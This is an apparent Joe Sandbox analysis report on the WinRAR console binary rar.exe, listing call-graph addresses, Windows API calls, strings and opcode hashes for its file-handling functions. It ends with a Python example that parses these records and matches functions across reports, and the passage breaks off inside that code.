39255->39256 39261 7ff7d7a07a59 39255->39261 39256->39208 39257 7ff7d7a07a7c 39319 7ff7d7a0b6d0 73 API calls _Init_thread_footer 39257->39319 39260 7ff7d7a07b1c 60 API calls 39260->39261 39261->39256 39261->39257 39261->39260 39287 7ff7d7a071fc 39261->39287 39320 7ff7d79d41b0 14 API calls 2 library calls 39261->39320 39264 7ff7d79c6ee6 39263->39264 39269 7ff7d79c6f5c 39263->39269 39376 7ff7d7a09f64 8 API calls memcpy_s 39264->39376 39266 7ff7d79c6efb 39268 7ff7d79c6f2f 39266->39268 39266->39269 39268->39266 39377 7ff7d79c7188 12 API calls 39268->39377 39269->39200 39269->39269 39271 7ff7d7a06f8a 39270->39271 39272 7ff7d7a06fb4 39270->39272 39271->39272 39273 7ff7d79e4538 FindClose 39271->39273 39273->39271 39274->39195 39275->39208 39276->39208 39278 7ff7d79c5742 39277->39278 39284 7ff7d79c575d 39277->39284 39278->39284 39382 7ff7d79f3520 12 API calls 2 library calls 39278->39382 39282 7ff7d79c57fc 39282->39208 39283 7ff7d79f48bc 8 API calls 39283->39282 39378 7ff7d79f3610 39284->39378 39285->39208 39286->39208 39292 7ff7d7a07217 setbuf 39287->39292 39288 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39290 7ff7d7a0776f 39288->39290 39290->39261 39302 7ff7d7a0729c 39292->39302 39310 7ff7d7a0725a 39292->39310 39313 7ff7d7a073c5 39292->39313 39334 7ff7d79e4554 39292->39334 39293 7ff7d7a07453 39295 7ff7d7a07476 39293->39295 39296 7ff7d7a07464 39293->39296 39315 7ff7d7a07496 39295->39315 39331 7ff7d79e4538 39295->39331 39342 7ff7d7a07c38 55 API calls 3 library calls 39296->39342 39299 7ff7d7a07342 39299->39310 39314 7ff7d7a07656 39299->39314 39318 7ff7d7a076ef 39299->39318 39343 7ff7d79d4380 14 API calls 39299->39343 39300 7ff7d7a07471 39300->39295 39304 7ff7d7a073bb 39302->39304 39306 7ff7d7a0732e 39302->39306 39321 7ff7d7a1a444 39304->39321 39306->39299 39307 7ff7d7a0734a 39306->39307 39309 7ff7d7a0737e 39307->39309 39307->39310 39340 7ff7d79d4380 14 API calls 39307->39340 39308 7ff7d79e4554 16 API calls 39308->39310 39309->39310 39341 7ff7d79dcbd0 75 API calls 
39309->39341 39310->39288 39327 7ff7d79e45cc 39313->39327 39314->39310 39314->39314 39316 7ff7d7a07723 39314->39316 39314->39318 39315->39308 39315->39310 39344 7ff7d79cc214 8 API calls 2 library calls 39316->39344 39318->39310 39345 7ff7d79e8558 10 API calls 2 library calls 39318->39345 39320->39261 39324 7ff7d7a1a44f 39321->39324 39322 7ff7d7a1a47a 39322->39313 39323 7ff7d7a236c0 new 2 API calls 39323->39324 39324->39322 39324->39323 39346 7ff7d7a1b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39324->39346 39347 7ff7d7a1b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39324->39347 39328 7ff7d79e45ed 39327->39328 39329 7ff7d79e46ec 15 API calls 39328->39329 39330 7ff7d79e46b2 39328->39330 39329->39328 39330->39293 39330->39299 39332 7ff7d79e454f 39331->39332 39333 7ff7d79e4549 FindClose 39331->39333 39332->39315 39333->39332 39335 7ff7d79e4570 39334->39335 39336 7ff7d79e4574 39335->39336 39348 7ff7d79e46ec 39335->39348 39336->39302 39339 7ff7d79e458d FindClose 39339->39336 39340->39309 39341->39310 39342->39300 39343->39314 39344->39310 39345->39310 39349 7ff7d79e4705 setbuf 39348->39349 39350 7ff7d79e47a4 FindNextFileW 39349->39350 39351 7ff7d79e4733 FindFirstFileW 39349->39351 39353 7ff7d79e47ae GetLastError 39350->39353 39360 7ff7d79e478b 39350->39360 39352 7ff7d79e4749 39351->39352 39351->39360 39361 7ff7d79f4534 39352->39361 39353->39360 39356 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39359 7ff7d79e4587 39356->39359 39357 7ff7d79e475f FindFirstFileW 39358 7ff7d79e477a GetLastError 39357->39358 39357->39360 39358->39360 39359->39336 39359->39339 39360->39356 39362 7ff7d79f4549 setbuf 39361->39362 39372 7ff7d79f45a2 39362->39372 39373 7ff7d79f472c CharUpperW 39362->39373 39364 7ff7d79f4579 39374 7ff7d79f4760 CharUpperW 39364->39374 39365 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39366 7ff7d79e475b 39365->39366 39366->39357 39366->39358 39368 7ff7d79f4592 39369 7ff7d79f4629 
GetCurrentDirectoryW 39368->39369 39370 7ff7d79f459a 39368->39370 39369->39372 39375 7ff7d79f472c CharUpperW 39370->39375 39372->39365 39373->39364 39374->39368 39375->39372 39376->39266 39377->39268 39379 7ff7d79f3626 setbuf wcschr 39378->39379 39380 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39379->39380 39381 7ff7d79c57e1 39380->39381 39381->39282 39381->39283 39382->39284 39384 7ff7d79d8919 39383->39384 39409 7ff7d7a04b14 39384->39409 39386 7ff7d79d8954 memcpy_s 39386->39213 39388 7ff7d79f9199 39387->39388 39389 7ff7d7a1a480 4 API calls 39388->39389 39390 7ff7d79f91be 39389->39390 39391 7ff7d7a1a444 new 4 API calls 39390->39391 39392 7ff7d79f91cf 39391->39392 39393 7ff7d79d88dc 8 API calls 39392->39393 39395 7ff7d79f91e1 39392->39395 39393->39395 39394 7ff7d7a1a444 new 4 API calls 39396 7ff7d79f91f7 39394->39396 39395->39394 39397 7ff7d79f9209 39396->39397 39398 7ff7d79d88dc 8 API calls 39396->39398 39397->39215 39398->39397 39400 7ff7d79d88dc 8 API calls 39399->39400 39401 7ff7d79f7063 39400->39401 39402 7ff7d79f72c0 4 API calls 39401->39402 39403 7ff7d79c7325 39402->39403 39403->39218 39403->39220 39414 7ff7d7a07d80 39404->39414 39410 7ff7d7a04b26 39409->39410 39411 7ff7d7a04b2b 39409->39411 39413 7ff7d7a04b38 8 API calls _UnwindNestedFrames 39410->39413 39411->39386 39413->39411 39421 7ff7d7a08094 39414->39421 39417 7ff7d79e8a44 39418 7ff7d79e8a5a memcpy_s 39417->39418 39425 7ff7d7a0bac4 39418->39425 39422 7ff7d7a0809f 39421->39422 39423 7ff7d7a07ec8 68 API calls 39422->39423 39424 7ff7d79e896e 39423->39424 39424->39417 39428 7ff7d7a0ba70 GetCurrentProcess GetProcessAffinityMask 39425->39428 39429 7ff7d79e89c5 39428->39429 39429->39220 39431 7ff7d79f9245 39430->39431 39438 7ff7d79e6194 39431->39438 39433 7ff7d79f92b1 39434 7ff7d79e6194 72 API calls 39433->39434 39435 7ff7d79f92bd 39434->39435 39436 7ff7d79e6194 72 API calls 39435->39436 39437 7ff7d79f92c9 39436->39437 39439 7ff7d79e61b4 39438->39439 39441 7ff7d79e61bc 39438->39441 39442 7ff7d7a0b850 
39439->39442 39441->39433 39449 7ff7d7a0bbfc 39442->39449 39445 7ff7d7a0b898 39453 7ff7d7a0b974 WaitForSingleObject 39445->39453 39446 7ff7d7a0b8b9 DeleteCriticalSection FindCloseChangeNotification CloseHandle 39450 7ff7d7a0b871 ReleaseSemaphore 39449->39450 39451 7ff7d7a0bc0e ResetEvent ReleaseSemaphore 39449->39451 39450->39445 39450->39446 39452 7ff7d7a0b974 65 API calls 39451->39452 39452->39450 39454 7ff7d7a0b8a2 FindCloseChangeNotification 39453->39454 39455 7ff7d7a0b986 GetLastError 39453->39455 39454->39445 39454->39446 39459 7ff7d79dca6c 48 API calls 3 library calls 39455->39459 39457 7ff7d7a0b9a6 39460 7ff7d79dca40 61 API calls _CxxThrowException 39457->39460 39459->39457 39460->39454 39461->39232 39462->39234 39463->39241 39464->39240 39465->39229 39466->39235 39467->39231 39468->39246 39469 7ff7d79c3b53 39470 7ff7d79c3b64 39469->39470 39519 7ff7d79e1e80 39470->39519 39471 7ff7d79c3c09 39531 7ff7d79e23f0 39471->39531 39473 7ff7d79c3bb6 39473->39471 39474 7ff7d79c3c18 39473->39474 39475 7ff7d79c3c01 39473->39475 39536 7ff7d79c8050 157 API calls 39474->39536 39477 7ff7d79e1c24 12 API calls 39475->39477 39477->39471 39478 7ff7d79c3c3d 39537 7ff7d79c8010 13 API calls 39478->39537 39479 7ff7d79c3ccc 39501 7ff7d79c3c90 39479->39501 39544 7ff7d79e2414 61 API calls 39479->39544 39482 7ff7d79c3c45 39485 7ff7d79c3c54 39482->39485 39538 7ff7d79dcba8 75 API calls 39482->39538 39484 7ff7d79c3cf9 39545 7ff7d79e1998 138 API calls 39484->39545 39539 7ff7d79ca9d4 186 API calls wcschr 39485->39539 39489 7ff7d79c3d10 39492 7ff7d79e18ac 15 API calls 39489->39492 39490 7ff7d79c3c5c 39540 7ff7d79c93ac 8 API calls 39490->39540 39492->39501 39493 7ff7d79c3c66 39495 7ff7d79c3c77 39493->39495 39541 7ff7d79dca40 61 API calls _CxxThrowException 39493->39541 39542 7ff7d79c8090 8 API calls 39495->39542 39498 7ff7d79c3c7f 39498->39501 39543 7ff7d79dca40 61 API calls _CxxThrowException 39498->39543 39546 7ff7d7a0d400 48 API calls 39501->39546 39520 7ff7d79e1e95 setbuf 39519->39520 
39521 7ff7d79e1ecb CreateFileW 39520->39521 39522 7ff7d79e1f59 GetLastError 39521->39522 39529 7ff7d79e1fb8 39521->39529 39523 7ff7d79f4534 10 API calls 39522->39523 39526 7ff7d79e1f74 39523->39526 39524 7ff7d79e1ff7 39527 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39524->39527 39525 7ff7d79e1fd9 SetFileTime 39525->39524 39528 7ff7d79e1f78 CreateFileW GetLastError 39526->39528 39526->39529 39530 7ff7d79e203a 39527->39530 39528->39529 39529->39524 39529->39525 39530->39473 39547 7ff7d79e24e8 39531->39547 39534 7ff7d79e240e 39534->39479 39536->39478 39537->39482 39539->39490 39540->39493 39541->39495 39542->39498 39543->39501 39544->39484 39545->39489 39553 7ff7d79e1af0 39547->39553 39550 7ff7d79e23f9 39550->39534 39552 7ff7d79dca40 61 API calls _CxxThrowException 39550->39552 39552->39534 39554 7ff7d79e1b01 setbuf 39553->39554 39555 7ff7d79e1b6f CreateFileW 39554->39555 39556 7ff7d79e1b68 39554->39556 39555->39556 39557 7ff7d79e1be1 39556->39557 39558 7ff7d79f4534 10 API calls 39556->39558 39561 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39557->39561 39559 7ff7d79e1bb3 39558->39559 39559->39557 39560 7ff7d79e1bb7 CreateFileW 39559->39560 39560->39557 39562 7ff7d79e1c14 39561->39562 39562->39550 39563 7ff7d79dca08 10 API calls 39562->39563 39563->39550 39564 7ff7d7a22450 39571 7ff7d7a23734 39564->39571 39566 7ff7d7a22455 39567 7ff7d7a26998 fflush LeaveCriticalSection 39566->39567 39568 7ff7d7a22460 39567->39568 39569 7ff7d7a2246c 39568->39569 39570 7ff7d7a22488 11 API calls 39568->39570 39570->39569 39576 7ff7d7a25630 35 API calls 3 library calls 39571->39576 39573 7ff7d7a2373f 39577 7ff7d7a24a1c 35 API calls abort 39573->39577 39576->39573 39578 7ff7d7a0bb70 39581 7ff7d7a0bb80 39578->39581 39590 7ff7d7a0bae8 39581->39590 39583 7ff7d7a0bb79 39585 7ff7d7a0bbc8 SetEvent 39586 7ff7d7a0bbd5 LeaveCriticalSection 39585->39586 39587 7ff7d7a0bae8 67 API calls 39586->39587 39588 7ff7d7a0bb97 39587->39588 39588->39583 39595 7ff7d79d1690 39588->39595 39591 7ff7d7a0b974 65 
API calls 39590->39591 39592 7ff7d7a0bb09 39591->39592 39593 7ff7d7a0bb12 39592->39593 39594 7ff7d7a0bb16 EnterCriticalSection LeaveCriticalSection 39592->39594 39593->39588 39594->39593 39596 7ff7d79d16a4 39595->39596 39597 7ff7d79d16c2 EnterCriticalSection 39595->39597 39596->39597 39599 7ff7d79d1180 39596->39599 39597->39585 39597->39586 39600 7ff7d79d11ab 39599->39600 39605 7ff7d79d11b0 39599->39605 39609 7ff7d79d17c8 39600->39609 39602 7ff7d79d166a 39602->39596 39603 7ff7d79f6d38 216 API calls 39603->39605 39604 7ff7d79d1080 48 API calls 39604->39605 39605->39602 39605->39603 39605->39604 39606 7ff7d79f6fe8 216 API calls 39605->39606 39607 7ff7d79d17c8 216 API calls 39605->39607 39608 7ff7d79f6e90 216 API calls 39605->39608 39606->39605 39607->39605 39608->39605 39611 7ff7d79d1813 memcpy_s 39609->39611 39619 7ff7d79e8328 39611->39619 39612 7ff7d79f6fe8 216 API calls 39613 7ff7d79d192f 39612->39613 39613->39612 39618 7ff7d79d19db 39613->39618 39614 7ff7d79d1b27 39615 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39614->39615 39616 7ff7d79d1b33 39615->39616 39616->39605 39617 7ff7d79f6fe8 216 API calls 39617->39618 39618->39614 39618->39617 39620 7ff7d79e834c setbuf 39619->39620 39625 7ff7d79e81bc 39620->39625 39622 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39623 7ff7d79e853b 39622->39623 39623->39613 39624 7ff7d79e83ab memcpy_s 39624->39622 39628 7ff7d79e81d8 memcpy_s setbuf 39625->39628 39626 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39627 7ff7d79e830c 39626->39627 39627->39624 39628->39626 39629 7ff7d7a0a924 39631 7ff7d7a0a949 sprintf 39629->39631 39630 7ff7d7a0a97f CompareStringA 39631->39630 39632 7ff7d79c7a5b 39633 7ff7d79c7a60 39632->39633 39634 7ff7d79d9be0 14 API calls 39633->39634 39636 7ff7d79c7af7 39633->39636 39634->39636 39635 7ff7d79c7bda 39638 7ff7d79cb540 147 API calls 39635->39638 39636->39635 39665 7ff7d79e1e1c GetFileTime 39636->39665 39639 7ff7d79c7bf8 39638->39639 39642 7ff7d79c7c3e 39639->39642 39666 7ff7d7a19b98 216 API calls 3 
library calls 39639->39666 39641 7ff7d79cb540 147 API calls 39644 7ff7d79c7c9c 39641->39644 39642->39641 39643 7ff7d79c7f89 39644->39643 39667 7ff7d79e6378 39644->39667 39646 7ff7d79c7cd7 39647 7ff7d79e6378 4 API calls 39646->39647 39649 7ff7d79c7cf3 39647->39649 39648 7ff7d79c7de1 39655 7ff7d79c7e4e 39648->39655 39672 7ff7d79f98dc 39648->39672 39649->39648 39651 7ff7d79c7d59 39649->39651 39652 7ff7d79c7d38 39649->39652 39654 7ff7d7a1a444 new 4 API calls 39651->39654 39653 7ff7d7a1a444 new 4 API calls 39652->39653 39659 7ff7d79c7d42 std::bad_alloc::bad_alloc 39653->39659 39654->39659 39678 7ff7d79c1204 48 API calls 39655->39678 39657 7ff7d79c7eb3 39660 7ff7d79c7edb 39657->39660 39679 7ff7d79f9680 39657->39679 39659->39648 39671 7ff7d7a1ba34 RtlPcToFileHeader RaiseException 39659->39671 39685 7ff7d79e6424 8 API calls _UnwindNestedFrames 39660->39685 39662 7ff7d79c7f56 39664 7ff7d79cb540 147 API calls 39662->39664 39664->39643 39665->39635 39666->39642 39668 7ff7d79e6396 39667->39668 39670 7ff7d79e63a0 39667->39670 39669 7ff7d7a1a444 new 4 API calls 39668->39669 39669->39670 39670->39646 39671->39648 39673 7ff7d79f9926 39672->39673 39674 7ff7d79f993c 39672->39674 39675 7ff7d79d90b8 75 API calls 39673->39675 39676 7ff7d79d90b8 75 API calls 39674->39676 39677 7ff7d79f9934 39675->39677 39676->39677 39677->39655 39678->39657 39683 7ff7d79f96a4 39679->39683 39680 7ff7d79f97d7 39681 7ff7d79e2574 126 API calls 39681->39683 39683->39680 39683->39681 39684 7ff7d7a19b98 216 API calls 39683->39684 39686 7ff7d79e6498 72 API calls new 39683->39686 39684->39683 39685->39662 39686->39683
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: 8d86d23f41193366dd77571e65ff63bb6f21e4dd1e87cefd87c033e20419a918
• Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction Fuzzy Hash: 87C2B22390C19381EB64BF24818D1BDA6A1AF417D8FDD8437DA4E4B2CADE6DA547C370
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                      • API String ID: 0-1660254149
                                                                                                                                                                      • Opcode ID: 536486dfd579ff9ae80834c81cdf08dfd6669d860ad932a24ecd01010a181a58
                                                                                                                                                                      • Instruction ID: fb578db1b8e6690805e7a63c8e08ed93ceba76a154485982df84cee1bd7184a4
                                                                                                                                                                      • Opcode Fuzzy Hash: 536486dfd579ff9ae80834c81cdf08dfd6669d860ad932a24ecd01010a181a58
                                                                                                                                                                      • Instruction Fuzzy Hash: B4E28D27A09AC285EF20EB25D8401EDA7A1FB8578CFC94037DA4D4779ADF39D546CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                      • String ID: rarlng.dll
                                                                                                                                                                      • API String ID: 2520153904-1675521814
                                                                                                                                                                      • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                      • Instruction ID: 6ddbd3eb51142395f2c8ff551431545c594864f1a0d12d9c8211bcc7394be84e
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                      • Instruction Fuzzy Hash: A431723171864286FB68AF29E840AEDA760FB85785FC04437EA4D42698DF3CE546CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E4736
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E476B
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E477A
                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E47A4
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E47B2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 869497890-0
                                                                                                                                                                      • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                      • Instruction ID: 5bfe7be57d51eefb484a7c48ca2dae7f70e139c06bffa7e519955e83964d2f07
                                                                                                                                                                      • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                      • Instruction Fuzzy Hash: 6441B23270968256EA28AB29E5402EDA3A0FB497B8FC00332FB7D477D5DF6CD1568710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%
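
The record above is the report's per-function view: the Win32 calls the function makes (here the FindFirstFileW / GetLastError / FindNextFileW sequence of a directory walk, each with its call-site address), the tokenised API ID, the String ID, and the Opcode ID that identifies the function body. As an added example, not Joe Sandbox tooling, the Python below parses records in this layout, rebases each `ref:` address to an RVA using the `Offset:` given in the Source File line (the dump is ASLR-relocated, the on-disk rar.exe is not), tags functions by their API word set, and matches Opcode IDs between two reports to find reused functions. The record-layout rules, the tag names, and the assumption that an equal Opcode ID means the same function code are this example's own; the sample input is constructed from the records on this page.

```python
# Added example (not Joe Sandbox code): parse the per-function records on this
# page, rebase call sites to RVAs, tag functions by API pattern, match Opcode IDs.
# Layout assumed from this report: a record starts at 'APIs'; calls are bulleted
# 'Name.MODULE(args), ref: ADDR'; 'Key: value' bullets follow section headers.
import re
from dataclasses import dataclass, field
from typing import List, Optional

API_CALL = re.compile(r"^[•-]?\s*(?P<name>\w+)\.(?P<module>\w+)\(.*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KEY_VALUE = re.compile(r"^[•-]?\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SCORE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?[0-9.]+)%")
HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness", "Control-flow Graph"}

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int  # absolute call-site address in the (ASLR-relocated) dump

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)
    uniqueness: Optional[float] = None

    def get(self, key: str) -> str:
        return self.meta.get(key, "")

    def image_base(self) -> Optional[int]:
        # 'Source File: ...sdmp, Offset: 00007FF7D79C0000, based on PE: true'
        m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", self.get("Source File"))
        return int(m.group(1), 16) if m else None

def parse_records(text: str) -> List[FunctionRecord]:
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":  # every record begins with this header
            current, section = FunctionRecord(), "APIs"
            records.append(current)
            continue
        if current is None:
            continue
        if line in HEADERS:
            section = line
            continue
        m = SCORE.match(line)
        if m:
            current.uniqueness = float(m.group("score"))
            continue
        if section == "APIs":
            m = API_CALL.match(line)
            if m:
                current.calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16)))
                continue
        m = KEY_VALUE.match(line)
        if m:
            current.meta[m["key"].strip()] = m["value"].strip()
    return records

def call_rvas(rec: FunctionRecord):
    """Rebase call-site addresses to RVAs so they can be located in the on-disk PE."""
    base = rec.image_base()
    return [(c.name, c.ref - base) for c in rec.calls] if base is not None else []

def api_id_words(api_id: str) -> set:
    """'FileFind$ErrorFirstLast$Next' -> {'File','Find','Error','First','Last','Next'}."""
    return {w for chunk in api_id.split("$") for w in re.findall(r"[A-Z][a-z]*", chunk)}

# Heuristic tags (this example's own naming) keyed on API ID word sets.
RULES = {
    "directory-enumeration": {"File", "Find", "First", "Next"},
    "csp-random": {"Crypt", "Context", "Random"},
    "runtime-library-load": {"Library", "Load"},
}

def classify(rec: FunctionRecord) -> List[str]:
    words = api_id_words(rec.get("API ID"))
    tags = [tag for tag, need in RULES.items() if need <= words]
    names = {c.name for c in rec.calls}
    if {"FindFirstFileW", "FindNextFileW"} <= names and "directory-enumeration" not in tags:
        tags.append("directory-enumeration")  # fall back to the raw import list
    if "runtime-library-load" in tags and rec.get("String ID").lower().endswith(".dll"):
        tags.append("loads:" + rec.get("String ID"))  # DLL named in the function's strings
    return tags

def shared_functions(report_a, report_b) -> List[str]:
    """Opcode IDs present in both reports (assumed: equal ID means the same function code)."""
    ids_b = {r.get("Opcode ID") for r in report_b if r.get("Opcode ID")}
    return sorted(r.get("Opcode ID") for r in report_a if r.get("Opcode ID") in ids_b)

# Constructed input: three records trimmed from the rar.exe dump records on this page.
SAMPLE_REPORT = """
APIs
• FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E4736
• FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E476B
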